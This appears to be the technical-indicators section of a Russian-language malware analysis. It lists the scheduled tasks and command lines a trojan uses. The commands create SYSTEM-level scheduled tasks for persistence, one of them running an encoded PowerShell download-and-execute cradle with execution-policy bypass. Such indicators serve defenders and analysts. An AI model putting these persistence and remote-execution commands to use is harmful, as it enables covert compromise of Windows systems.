Техническая информация
- <SYSTEM32>\tasks\microsoft\windows\bluetooths
- <SYSTEM32>\tasks\qxnhieh
- <SYSTEM32>\tasks\ttpdr
- '<SYSTEM32>\cmd.exe' /c copy /y %WINDIR%\temp\svchost.exe %WINDIR%\qXnHiEh.exe&move /y %WINDIR%\temp\dig.exe %WINDIR%\hKQy.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c copy /y %WINDIR%\temp\svchost.exe %WINDIR%\qXnHiEh.exe&move /y %WINDIR%\temp\dig.exe %WINDIR%\hKQy.exe&if exist C:/windows/system32/WindowsPowerShell/ (schtasks /create /ru system /sc MINUTE...
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetooths" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0A...
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /st 07:05:00 /tn qXnHiEh /tr "%WINDIR%\qXnHiEh.exe" /F
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\TTPDr" /tr "%WINDIR%\hKQy.exe" /F